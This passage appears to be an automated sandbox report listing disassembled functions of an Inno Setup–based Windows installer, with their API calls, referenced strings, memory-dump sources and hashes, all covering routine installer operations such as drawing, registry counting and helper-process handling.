                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?), ref: 0041CAED
                                                                                      • 73A08830.GDI32(0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CAFC
                                                                                      • 73A022A0.GDI32(0041CDAC,0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CB05
                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041CB1E
                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0041CB35
                                                                                      • 73A14D40.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CB7A,?,?,00000000), ref: 0041CB51
                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041CB5E
                                                                                      • DeleteDC.GDI32(00000000), ref: 0041CB74
                                                                                        • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                                      • String ID:
                                                                                      • API String ID: 2377543522-0
                                                                                      • Opcode ID: d7b92da64cecfd48f0a2b1e7f5bec81e0b40094dab39069241f93e3b0f0d639f
                                                                                      • Instruction ID: 7128b10ae0d2f5501f58bad1f60f679124a592cf14607d549707b49f1954e982
                                                                                      • Opcode Fuzzy Hash: d7b92da64cecfd48f0a2b1e7f5bec81e0b40094dab39069241f93e3b0f0d639f
                                                                                      • Instruction Fuzzy Hash: 5961FC71A44609ABDF10EBE5DC86FAFB7B8EF48704F10446AF504E7281C67CA9418B69
                                                                                      Function 0042DEBC Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • AllocateAndInitializeSid.ADVAPI32(00494788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DEF6
                                                                                      • GetVersion.KERNEL32(00000000,0042E0A0,?,00494788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF13
                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E0A0,?,00494788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF2C
                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DF32
                                                                                      • FreeSid.ADVAPI32(00000000,0042E0A7,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E09A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressAllocateFreeHandleInitializeModuleProcVersion
                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                      • API String ID: 1717332306-1888249752
                                                                                      • Opcode ID: 59bbf30f185a9ae2ec61c265cb76b637c59ffee8dc596189c0408cef68f3f34f
                                                                                      • Instruction ID: 5045d4bdae095839e21654112f0de3b8f2816e6eca6f617d5415efb28b53f152
                                                                                      • Opcode Fuzzy Hash: 59bbf30f185a9ae2ec61c265cb76b637c59ffee8dc596189c0408cef68f3f34f
                                                                                      • Instruction Fuzzy Hash: 6151C571B44629AEDB10EAE69C42F7F77ECEB09304F94447BB500F7282C5BC9806866D
                                                                                      Function 00492A8C Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 251synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(?,00000005,00000000,00492E24,?,?,00000000,?,00000000,00000000,?,00493165,00000000,0049316F,?,00000000), ref: 00492B0F
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492E24,?,?,00000000,?,00000000,00000000,?,00493165,00000000), ref: 00492B22
                                                                                      • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492E24,?,?,00000000,?,00000000,00000000), ref: 00492B32
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00492B53
                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492E24,?,?,00000000,?,00000000), ref: 00492B63
                                                                                        • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00492520,00000000,004926E9,?,?,00000005), ref: 0042D35D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                      • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$e1I$o1I
                                                                                      • API String ID: 2000705611-221793176
                                                                                      • Opcode ID: 93f4319d652df31d1491f7e58c9920bd5a7ef255fec07566d47bc37a90253f49
                                                                                      • Instruction ID: 4be49199d801b1cb5a3f4bb92d7f292d3e3738ea6ecad4381c70a4705d363757
                                                                                      • Opcode Fuzzy Hash: 93f4319d652df31d1491f7e58c9920bd5a7ef255fec07566d47bc37a90253f49
                                                                                      • Instruction Fuzzy Hash: 3891D434A04205AFDF11EBA5D956BAF7FB4EB09304F918477F400AB692C6BD9C05CB19
                                                                                      Function 00458DE4 Relevance: 21.2, APIs: 2, Strings: 10, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,0045907E,?,?,?,?,?,00000006,?,00000000,00491FBA,?,00000000,0049205D), ref: 00458F30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: .chm$.chw$.fts$.gid$.hlp$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                      • API String ID: 1452528299-1593206319
                                                                                      • Opcode ID: 5d7b9d7c30f83f3247b130719882f36e307d81f231b67c3dd7c11efa3abf157e
                                                                                      • Instruction ID: e4eb3b4405a0979e1a2c77286c885a36d1837fd04eb9654633cb4fd66a7308d3
                                                                                      • Opcode Fuzzy Hash: 5d7b9d7c30f83f3247b130719882f36e307d81f231b67c3dd7c11efa3abf157e
                                                                                      • Instruction Fuzzy Hash: 7B618E30B042549BDB10EB69C8827AE77A9AB48715F50486FF801EB383CB789D49C799
                                                                                      Function 0041B31C Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B333
                                                                                      • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B33D
                                                                                      • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B34F
                                                                                      • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B366
                                                                                      • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B372
                                                                                      • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B39F
                                                                                      • 73A0A480.USER32(00000000,00000000,0041B3D2,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                                      • DeleteDC.GDI32(?), ref: 0041B449
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                                      • String ID:
                                                                                      • API String ID: 3135053572-0
                                                                                      • Opcode ID: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                                      • Instruction ID: ef99a8f9a6f00624a9096b2aeeb37702e3b70ceb3a8cbf3cb68c8f3869cb2bd7
                                                                                      • Opcode Fuzzy Hash: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                                      • Instruction Fuzzy Hash: 1541D071E40619AFDF10DAE9D846FEFB7BCEF08704F104466B614FB281C67869408BA4
                                                                                      Function 0046E8BC Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 319COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0046EA4F
                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EB46
                                                                                      • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0046EB5C
                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EB81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                      • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                      • API String ID: 971782779-3668018701
                                                                                      • Opcode ID: f899328f81346ceb28187c7e053454cefd689a42d0f673cda6a499a0fcfe0b0b
                                                                                      • Instruction ID: 9b3c0a2ebe02865d096d3d92589461d85e8d30d772736a84054ea4ba39fb763a
                                                                                      • Opcode Fuzzy Hash: f899328f81346ceb28187c7e053454cefd689a42d0f673cda6a499a0fcfe0b0b
                                                                                      • Instruction Fuzzy Hash: FBD12274A00249AFDB01DF95D885FDEBBF5AF08314F54402AF900B7392D678AE45CB69
                                                                                      Function 00453338 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegQueryValueExA.ADVAPI32(00459246,00000000,00000000,?,00000000,?,00000000,004535D1,?,00459246,00000003,00000000,00000000,00453608), ref: 00453451
                                                                                        • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451E7B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                                      • RegQueryValueExA.ADVAPI32(00459246,00000000,00000000,00000000,?,00000004,00000000,0045351B,?,00459246,00000000,00000000,?,00000000,?,00000000), ref: 004534D5
                                                                                      • RegQueryValueExA.ADVAPI32(00459246,00000000,00000000,00000000,?,00000004,00000000,0045351B,?,00459246,00000000,00000000,?,00000000,?,00000000), ref: 00453504
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004533A8
                                                                                      • , xrefs: 004533C2
                                                                                      • RegOpenKeyEx, xrefs: 004533D4
                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045336F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$FormatMessageOpen
                                                                                      • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                      • API String ID: 2812809588-1577016196
                                                                                      • Opcode ID: d547f96382ddb47af51d9cc29b1b85abbfcd8a0dd46a61b3a596026ad2d6d4ad
                                                                                      • Instruction ID: 553864e69fa8df29f0895cd1651d22ce7dcdc08a544756bbeb7b66468d6216b8
                                                                                      • Opcode Fuzzy Hash: d547f96382ddb47af51d9cc29b1b85abbfcd8a0dd46a61b3a596026ad2d6d4ad
                                                                                      • Instruction Fuzzy Hash: DF912371A04208BBDB11DF95C942BDEB7F9EB08346F10446BF900F7282D6789F098B69
                                                                                      Function 00457208 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(?), ref: 0045723F
                                                                                      • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 0045725B
                                                                                      • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00457269
                                                                                      • GetExitCodeProcess.KERNEL32(?), ref: 0045727A
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 004572C1
                                                                                      • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 004572DD
                                                                                      Strings
                                                                                      • Helper process exited with failure code: 0x%x, xrefs: 004572A7
                                                                                      • Helper process exited, but failed to get exit code., xrefs: 004572B3
                                                                                      • Stopping 64-bit helper process. (PID: %u), xrefs: 00457231
                                                                                      • Helper isn't responding; killing it., xrefs: 0045724B
                                                                                      • Helper process exited., xrefs: 00457289
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                      • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                      • API String ID: 3355656108-1243109208
                                                                                      • Opcode ID: 6b2201595befcdbf0454e25f3f98579558f6d853a158eaa6821fe7e437e0bd5b
                                                                                      • Instruction ID: cbbbea6dedd0d273467075bf502e8a2b7be663cd85a1a49bef8c8f37b48c8077
                                                                                      • Opcode Fuzzy Hash: 6b2201595befcdbf0454e25f3f98579558f6d853a158eaa6821fe7e437e0bd5b
                                                                                      • Instruction Fuzzy Hash: 89215C70608B009AC720E779D441B5BB7D4AF08305F04897FBC9ACB283D678E8489B6A
                                                                                      Function 00452FEC Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC1C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004531C3,?,00000000,00453287), ref: 00453113
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004531C3,?,00000000,00453287), ref: 0045324F
                                                                                        • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451E7B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045305B
                                                                                      • , xrefs: 00453075
                                                                                      • RegCreateKeyEx, xrefs: 00453087
                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045302B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFormatMessageQueryValue
                                                                                      • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                      • API String ID: 2481121983-1280779767
                                                                                      • Opcode ID: 758553f8d2e594071fe37aa958d85f9a645975654b76cf36553100ddb6c8e864
                                                                                      • Instruction ID: 2c0c5fe921886f73e21521b3bff8a538c4309916fb6f6cfb0a6381ca684f6e5a
                                                                                      • Opcode Fuzzy Hash: 758553f8d2e594071fe37aa958d85f9a645975654b76cf36553100ddb6c8e864
                                                                                      • Instruction Fuzzy Hash: C5812171A00609AFDB00DFE5C941BDEB7B9EB08345F54446AF901F7282D778AA09CB69
                                                                                      Function 004913E4 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004524C4: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004915B5,_iu,?,00000000,004525FE), ref: 004525B3
                                                                                        • Part of subcall function 004524C4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004915B5,_iu,?,00000000,004525FE), ref: 004525C3
                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00491461
                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004915B5), ref: 00491482
                                                                                      • CreateWindowExA.USER32(00000000,STATIC,004915C4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004914A9
                                                                                      • SetWindowLongA.USER32(?,000000FC,00490C3C), ref: 004914BC
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00491588,?,?,000000FC,00490C3C,00000000,STATIC,004915C4), ref: 004914EC
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00491560
                                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00491588,?,?,000000FC,00490C3C,00000000), ref: 0049156C
                                                                                        • Part of subcall function 00452814: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004528FB
                                                                                      • 73A15CF0.USER32(?,0049158F,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00491588,?,?,000000FC,00490C3C,00000000,STATIC), ref: 00491582
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                      • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                      • API String ID: 170458502-2312673372
                                                                                      • Opcode ID: 5955ee03ed027167db5067d7769f0f2e7a3333a957f84736b9c043bd00e9a10a
                                                                                      • Instruction ID: 8fdd4e63cd422c3942ebc1833423ec4bc75e2ea9b26886e4930e7115e52d1235
                                                                                      • Opcode Fuzzy Hash: 5955ee03ed027167db5067d7769f0f2e7a3333a957f84736b9c043bd00e9a10a
                                                                                      • Instruction Fuzzy Hash: 10415270A04209AEDF00EBA5CD42F9E7BF8EB49714F51457AF500F72D2D6799E008BA8
                                                                                      Function 0042EBE0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetActiveWindow.USER32 ref: 0042EBEC
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042EC00
                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042EC0D
                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042EC1A
                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0042EC66
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042ECA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                      • API String ID: 2610873146-3407710046
                                                                                      • Opcode ID: ab635a9dbd45ec810e9935963670e5bdc3844d9f2a3901bc6b7a360ecf31759e
                                                                                      • Instruction ID: 4a37ecb70f16d0e534201d00fe1897e1a246a2af0c0267f068437e20043e9251
                                                                                      • Opcode Fuzzy Hash: ab635a9dbd45ec810e9935963670e5bdc3844d9f2a3901bc6b7a360ecf31759e
                                                                                      • Instruction Fuzzy Hash: 1221CF72301624AFD300DAAADC81F3B3698EB84B10F09452EF944EB382DA78DC048A59
                                                                                      Function 0045F2A8 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetActiveWindow.USER32 ref: 0045F2B4
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0045F2C8
                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0045F2D5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0045F2E2
                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0045F32E
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0045F36C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
